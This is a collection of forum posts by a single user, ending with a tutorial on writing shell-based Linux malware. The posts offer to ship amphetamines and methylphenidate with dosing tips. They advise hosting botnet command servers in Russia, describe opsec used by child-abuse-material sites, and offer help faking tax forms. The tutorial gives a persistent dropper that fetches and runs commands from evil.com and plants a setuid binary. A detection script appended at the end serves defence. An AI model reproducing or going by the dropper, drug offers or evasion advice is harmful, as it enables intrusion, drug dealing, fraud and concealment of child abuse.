Posts by Sophie

  1. Sophie Pedophile Tech Support
    I can send some fluoro amps over if you pay for shipping and the product, i don't have any supply at the moment. I can also ship over amp paste, vacuum sealed on the inside of an old HDD. I got loads of those. And i only need to make a phone call to get paste up to 100g, but that would be excessive for studying lmao. I got methylphenidate out the ass, if you pay for shipping i'll send some of those over for next to nothing.
  2. Sophie Pedophile Tech Support
    2-FMA, if you can source it. Coke isn't something i experience as a 'productivity drug'. Low dose Methylphenidate, or Ethylphenidate, the Ethyl variety should be dosed volumetrically as it's pretty potent. 5mg Ethylphenidate is a good dose to focus but still pretty 'speedy'.

    Good thing about the fluoro amps is that you can smoke them, which allows you to calibrate for lack of a better term after each hit.
  3. Sophie Pedophile Tech Support
    Yeah ^

    I mentioned something along those lines in the other thread about AlphaBay 2.0
  4. Sophie Pedophile Tech Support
    You're better off pulling the reverse, run operations against anything and everyone from Russian based infrastructure.
  5. Sophie Pedophile Tech Support
    I know this thread is a little heavy on the theory behind it all, and requires some understanding of relatively low level Linux, which is why i set up the secure storage with the resources i mentioned above. If you're interested they're still available, all you need to do is send me a PM.

    I'm still writing part two, even if interest in the subject at this level is limited, i find writing my thoughts out to be helpful in increasing my own understanding of the subject matter. As always, feel free to ask any questions regarding anything contained within this thread, or the previous one in the series. And feedback is appreciated as well.

    If you read the OP you know i am working on a Framework that will be deployed through Docker that will have a number of unique and custom tools, that will help with the creation of Bash/Sh based malware components, payloads and more. It will also have a broad selection of third party tools for obfuscation, encoding, platform specific payload generation and a small library of exploits that come in source code, pre-compiled, and as shellcode or ASM, depending on the type of attack it will allow you to execute.

    If you're not that big into the theory of it all, i am pretty sure you will appreciate the Docker Image as a powerful OffSec tool that will be easy to use. Complementary tools might include reverse engineering utils and scripts/programs that assist in creating ROP gadgets and more.
  6. Sophie Pedophile Tech Support
    Also i think it's live right this instant BTW.
  7. Sophie Pedophile Tech Support
    Originally posted by aldra I don't think the firearm thing is even relevant here, it's just whether the shootings were self defence or not

    The judge threw out the firearms charge IIRC.
  8. Sophie Pedophile Tech Support
    Here's a question for all you freedom loving, patriotic Americans ITT, and i don't mean that in a patronizing manner in the slightest, i was wondering about a couple things ammunition related. I was reminded of it because Speedy was talking about tracers.

    Now i know .50BMG comes in a broad variety in terms of rounds for specific purposes. The type of round is indicated by the color on the tip of the bullet. Black Tip indicates Armor penetrating round, red tip tracer round, blue tip incendiary and so on and so forth. I've seen rifles of lower caliber with a similar variety in round types. Although to the best of my knowledge the color coding scheme doesn't hold up in the same way as it does for the .50BMG.

    Does it depend on the caliber? Or does it differ between manufacturers? It would seem to me, a good idea to color code the rounds that have certain effects all the same, so no matter what caliber you're shooting for instance a tracer round should always have a red tip.

    Yet this doesn't seem to be the case, and i'd love to know why.
  9. Sophie Pedophile Tech Support
    If there is any justice left in the US of A the jury will acquit Kyle.
  10. Sophie Pedophile Tech Support
    IDK when it starts exactly, but here's my prediction. The State is going to spin a yarn, and tell a story on how Kyle was provoking the people he shot, and they will emphasize that provocation nullifies self-defense. Which in Washington State Law it does. Then the defense will go over all the technicalities, and emphasize the evidence presented which shows clearly it was a case of self defense. However they will tell it in an unengaging manner and bore the jury.

    Personally i hope the jury isn't intimidated by the fucking threats of riots and mayhem and has a basic understanding of the law, so they will acquit. If the Jury is compromised they may hand down a guilty verdict, and if they do i hope the Judge intervenes in some way. Not sure how, perhaps he can sentence Kyle to Time Served or whatever, unless there is a mandatory minimum.

    Posting this here because in essence it's a political trial.


    Free Kyle Rittenhouse, there will be riots, which is exactly why we need him. He's a top lad and did the right and honorable thing. What do you think is going to happen?
  11. Sophie Pedophile Tech Support
    It depends on how dark my mood is for the day/week/month.
  12. Sophie Pedophile Tech Support
    Originally posted by Donald Trump Hard mode: What are the odds of a bash script running between different linux installs?

    Nightmare mode: Over 20 years.

    Actually pretty good. Especially since you can fall back to Sh from Bash, which is POSIX compliant and standardized.
  13. Sophie Pedophile Tech Support
    Well, it's bump now, IDK if that's temporary. But i think your usertitle should have something to do with the fact you're Cree and something funny that combines with it, like excessive meth use or some such.
  14. Sophie Pedophile Tech Support
    Originally posted by Kev also the previous server was hosted in russia and i believe hacking is not illegal under russian law unless judged to be a threat to national security so that's the only reason i can think of banning the sale of any russian/kazakhstan insider info.

    Correct.
  15. Sophie Pedophile Tech Support
    Originally posted by aldra that one might be because they're hosting in Eastern Europe and don't want to attract the attention of the authorities there

    Good point. The way around that though, is prohibiting the sale of products to Russia, and from Russia. Russia's cyber crime laws only apply if it affects the Russian government. They don't care if you have a VPS there that's used in some kind of capacity as, let's say, a C2 server that controls a botnet that only operates in the US and Europe. Although they sometimes make exceptions for important European trading partners.
  16. Sophie Pedophile Tech Support
    Originally posted by the man who put it in my hood no russian stuff is kinda weird

    For sure, at first i thought it might have something to do with the latest sanctions on Russia, but that was specifically intended for the import of Russian ammunition, so if they're not going to have firearms vendors that idea falls flat. So pretty weird indeed.
  17. Sophie Pedophile Tech Support
    Originally posted by aldra aside from contract killings, doxing and the trade of (not just discussion of) weapons, the 'banned items' aren't likely to attract any more heat than unrestricted trade of drugs and stolen financial information.


    they're either moralising (which is a strange thing, historically, for a darkmarket to do) or they're the kind of thing a politician would be worried about being associated with if it comes out that it was a federally-run honeypot

    Right. It might be interesting to note that all contract killing sites/DNM Services have historically been scams though. So you could chalk that one up to their anti-scammer policies. But a honeypot is still very much a possibility.
  18. Sophie Pedophile Tech Support
    Originally posted by aldra suspicious

    Very much so. Most charitable interpretation i can give is that it's an attempt to decrease 'the heat'. Then again, IDK why you would do business in OffSec tooling and malware on anything other than a platform purposefully designed to deal in such things. At the very least they should have the option for users to privately contact Black hat 'service providers' and come to some agreement together, using the DNM's infrastructure but not have it out in the open.

    Also I2P has been getting better, but i am not sure if by I2P Over Tor they mean running I2P protocol through the Tor Network, vice versa or just use I2P rather than Tor Network.

    From reading the announcement they seem to be suggesting that they are working on a custom solution, being a new type of Network entirely (which would be a pretty huge undertaking) or a combination of existing technologies. To further decentralize i suppose they could federate parts of their infrastructure. And seeing as they are saying they want to create an overarching solution where new DNMs can use the new Network Architecture and individual vendors will be able to set up shops, it sounds like they are looking to federate.


    Personally i would give it a couple months and see how they are faring, if they come out with their own new secure type of network and related clients/overlay interface/bridges/proxies or what have you, those implementations need to be audited and reverse engineered to determine how secure they actually are.

    If they are undertaking such a project they should open source it, because at the end of the day even if everything seems secure, having it closed source is akin to security through obscurity, which isn't an effective method of securing something at all. What you want is the very design to be secure and decentralized by its very nature, so that even if you have all the source code, it doesn't matter who sees it or not because the system is built to only function in one way, that way being the most secure.


    I have my doubts. And as long as they are expanding the staff there is always the chance that they will be infiltrated. Once that happens, internal security protocols with regards to OPSEC, and general counter intelligence can be observed and studied, and once that happens it is only a matter of time unless they do it like the most 31337 CP sites. Not going to get into the weeds too much, but you need to pay an entrance fee in the form of original content, adhere to extremely strict OPSEC protocols like frequently changing usernames according to a theme and randomizing who gets which username, and using multiple PGP keys, that change with the username, according to a set. One lapse in discipline/judgement by an individual means immediate termination of the user account, invalidation of all their related keys etc.

    Such a format can only be used to trade in digital goods however, like media, but the format works very well for OffSec Tooling and Services as well.

    Anyway, my two cents.
  19. Sophie Pedophile Tech Support
    Got a copy of a valid w9 form? I'll tell you how hard it is to fake.
  20. Sophie Pedophile Tech Support
    Preamble

    Welcome to another edition of Sophie's Cyber Shenanigans. In this thread i want to take a closer look at some of the things we discussed in the previous thread, expand on the concept, and discuss some ideas related to it. Specifically on the potential of utilizing Sh/Bash as a universal solution for the development, deployment, and general operation of Malwares targeting *Nix.

    I've been a bit obsessed the last 6 to 10 months with creating effective malware for *Nix. In part due to the fact a lot of web servers use Linux Distros for their day to day operations, IoT/Embedded devices, and the fact that the maturity of *Nix allows for a variety of setups. Not just for people interested in programming or security, but media development, networking solutions up to the enterprise level, and general use as a day to day OS.

    As such I've done a lot more research into the feasibility of the concept by gathering resources that really take a deep dive approach to advanced shell scripting and Linux security in general. Before we move on from this rather long preamble i just wanted to mention that i set up a secure sharing platform, accessible by request, that you can use to download some of the resources i've been using. A couple things you can get from there are E-Books including Advanced Shellscripting in Bash, Advanced C for Unix, Linux Kernel Resources, documents related to how ELF and other *Nix executable formats work, Static Binaries, with source code and Makefiles, and a couple of PoCs. If you're interested in any of that send me a PM and i will give you access to the secure storage.

    Linux Malware

    Some stuff to consider.

    Most people have a general understanding that Linux is less susceptible to Malware and compared to anything Microsoft puts out that is certainly the case, not to mention the fact that Black Hats tend to focus more on Windows because at the end of the day that's where the money is. In practical terms though, while no system is 100% secure any distro can be configured to be as secure as possible, and while there are enough utilities OSS and otherwise that help with that, it takes a certain amount of know-how in order to harden Linux and be able to parse and interpret all the data coming in from logging tools and the like. Of course an enterprise will have this figured out if they have a decent blue team and/or SOC with the proper playbooks and incident response teams.

    Operations against specific enterprises should be conducted in a way that is tailored towards the enterprise and operational directive in question. That is not to say that Sh/bash based malware won't work, but a sophisticated threat actor will use all the intel available to them to decide what is best for their particular scenario. The above is tangentially related to what this thread is about but it should give you a little bit of context. When i am talking about a universal solution in terms of Linux malware, engaging an enterprise is a little bit more nuanced. What i am proposing is a universal solution in terms of compatibility with different distros and architectures. Which leads nicely into the following:


    Let's take a common Linux Rootkit technique as an example. A lot of those use LD_PRELOAD to inject their own libraries and hook functions on the target system; this is possible because of dynamically linked executables. In plain English, the dynamically linked executables (ELF files) essentially load one of the attacker's libs when executed, after being altered by the attacker specifying the LD_PRELOAD environment variable, which can change their behavior in wonderful and terrible ways. So far so good: you are not dependent on the libs specific to that system, and if you're smart you write your rootkit in such a way that it affects or checks for both ELF32 and ELF64 files to cover your bases.

    Writing a shell script, obfuscating it and having it run on the target machine will spare you the trouble though, because it will just invoke the utilities as they exist on the target machine.

    As an interesting aside;

    I have a tool that allows me to take a shell script i wrote, parse it, check the utils it invokes and automatically write out C source that will use the LD_PRELOAD method to change the libs the ELF files on the target machine uses in such a way that they will work as they are supposed to even if they differ from the same utils my machine would invoke. The C output i can then compile locally and ship off to any other Linux Box where it will run as if it were a static binary.

    You could even run a shell script through the tool i mentioned, and have the compiled version write out an obfuscated shell script on the target machine and then execute that as an embedded payload.

    If you're interested in reverse engineering and ELF Malware analysis you should definitely check the repo below out.

     git clone https://github.com/ashalaginov/Linux-ELF-malware-static-analysis.git 



    Implementations

    Your average linux distro is full of tools and utilities that are excellent for command and control operations, crypto ops, and all kinds of shenanigans. Below is an example i wrote of a shell script that checks a remote source every set interval of time, downloads a new script (set of commands) and runs it.


    #!/usr/bin/env -S bash\_"umask\_700"\_-f

    cd ~/.local/sbin 2>/dev/null 1>/dev/null || mkdir ~/.local/sbin 2>/dev/null 1>/dev/null

    buff_ops()
    {
    cmd=$1
    arg=$2
    rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
    };



    if [ -x $(which busybox) ]; then
    buff_ops 'busybox' '--install ~/.local/sbin'
    buff_ops 'chmod' '--recursive +xst . '

    cat << EOF > ~/.local/sbin/lpr
    #!/usr/bin/env -S bash\_"umask\_700"\_-f
    buff_ops()
    {
    cmd=$1
    arg=$2
    rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
    };

    buff_ops './watch ' '-t -n 120 -e wget -nv -O https://evil.com/commands.sh | sh & '
    EOF

    chmod 4777 ~/.local/sbin/lpr
    buff_ops './lpr'

    fi


    If i've made some mistakes regarding syntax, that's on me, i haven't had a chance to debug the above script yet.

    Also instead of creating new dirs in a place we might not have permissions to do so, we could always use the /tmp directory as a temporary staging area.

    For recon/enum regarding permissions simple one liners might be useful.


    # setuid files: "-perm -4000" tests for the setuid bit; a bare "4000" only matches files whose mode is exactly 4000
    find / -perm -4000 2>/dev/null
    # world-writable files and directories
    find / -perm -o+w 2>/dev/null


    An interactive shell will allow you to run this.



    And those are just some of the examples i've been working on.



    How this all ties together, how we might launch exploits in Asm or shellcode, and how we might compile such exploits in situ that is to say on the target machine, i'll leave up to PART 2 which i will post ITT. I'm on a schedule at the moment unfortunately. And this is about all the time i got for now.

    Also, in Part 2 i'll tell you all about a framework i am developing that puts all this and more together to allow me, and those that are interested, to create complete Sh/Bash based malwares with relative ease. I will release this framework as a Dockerfile when it's done. It's going to be dope.


    Anyway, in the meantime feel free to post some questions, correct me where i am wrong and leave some constructive criticism if you are so inclined. I'll be back later today to finish this up.
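The post above describes three things a defender can look for: a scheduled download piped into a shell, a named pipe feeding /bin/bash, a binary left setuid and world-writable, and LD_PRELOAD injection; its two `find` one-liners enumerate setuid and world-writable files. The following is an added example written from the detection side, not the poster's code or part of the framework they describe. It scans a shell script for those patterns and audits a directory tree for the same file modes the `find` commands target. The sample script, the directory layout, and the hostname c2.example.invalid are constructed for the demo and are not real indicators.

```python
"""Defender-side checks for the techniques described in the post above.

Added example, not the author's code. Two parts:
  1. scan_script(text) flags lines of a shell script that carry the patterns
     the post relies on: a download piped into a shell, the named-pipe-into-bash
     trick, a chmod that leaves a file both setuid and world-writable, and
     LD_PRELOAD injection.
  2. classify_mode()/audit_tree() report regular files that are setuid or
     world-writable, the conditions the post's two `find` one-liners look for,
     so an administrator can review them.
The sample script and directory layout are constructed for the demo; the
host c2.example.invalid is a placeholder, not a real indicator.
"""
import os
import re
import stat
import tempfile

# Each rule is (tag, compiled regex). The patterns are deliberately narrow so
# ordinary administration scripts produce few false positives.
RULES = [
    # wget/curl output piped straight into sh or bash
    ("download-to-shell", re.compile(r"\b(wget|curl)\b[^|\n]*\|\s*(ba)?sh\b")),
    # mknod ... p (a FIFO) whose contents are read into /bin/bash
    ("fifo-to-bash", re.compile(r"\bmknod\b.*\sp\b.*\|\s*/bin/bash")),
    # numeric mode with the setuid bit (4xxx-7xxx) and world write (xxx2/3/6/7),
    # or the symbolic "+xst" form used in the post
    ("suid-world-writable",
     re.compile(r"\bchmod\b.*\b[4-7][0-7]{2}[2367]\b|\bchmod\b.*\+xst")),
    # LD_PRELOAD set in the environment or the system-wide preload file touched
    ("ld-preload", re.compile(r"\bLD_PRELOAD=|/etc/ld\.so\.preload")),
]

# Constructed sample modelled on the dropper shown in the post (not the real one).
SAMPLE_SCRIPT = """#!/bin/bash
# constructed sample, nothing here is a live indicator
cd ~/.local/sbin 2>/dev/null || mkdir -p ~/.local/sbin
rm -f u_dev; mknod u_dev p && cat 0<u_dev | /bin/bash 1>u_dev
chmod 4777 ~/.local/sbin/lpr
watch -n 120 'wget -q -O - https://c2.example.invalid/commands.sh | sh' &
export LD_PRELOAD=/tmp/libhook.so
echo "ordinary housekeeping, nothing to flag"
"""


def scan_script(text):
    """Return [(line_number, tag, stripped_line)] for every rule that fires."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for tag, rx in RULES:
            if rx.search(line):
                hits.append((lineno, tag, line.strip()))
    return hits


def classify_mode(mode):
    """Tags for a st_mode value: setuid bit and/or world-writable bit."""
    tags = []
    if mode & stat.S_ISUID:
        tags.append("setuid")
    if mode & stat.S_IWOTH:
        tags.append("world-writable")
    return tags


def audit_tree(root):
    """Walk root and map relative paths of regular files to their tags.
    Symlinks are not followed (lstat), so a link to a system binary is not reported."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            tags = classify_mode(st.st_mode)
            if tags:
                findings[os.path.relpath(path, root)] = tags
    return findings


def demo_audit():
    """Build a constructed tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        layout = {"sbin/lpr": 0o4755, "tmp/scratch.sh": 0o666, "etc/ok.conf": 0o644}
        for rel, mode in layout.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write("# constructed sample file\n")
            os.chmod(path, mode)  # set the bits after the last write
        return audit_tree(root)


if __name__ == "__main__":
    for lineno, tag, line in scan_script(SAMPLE_SCRIPT):
        print(f"line {lineno}: {tag}: {line}")
    for rel, tags in sorted(demo_audit().items()):
        print(f"{rel}: {', '.join(tags)}")
```

Run it with `python3 scan.py`; `scan_script` can be pointed at any script pulled from a cron entry or a user's `~/.local` tree, and `audit_tree("/")` run as root gives the same list the post's `find` commands produce, with the symlink handling made explicit.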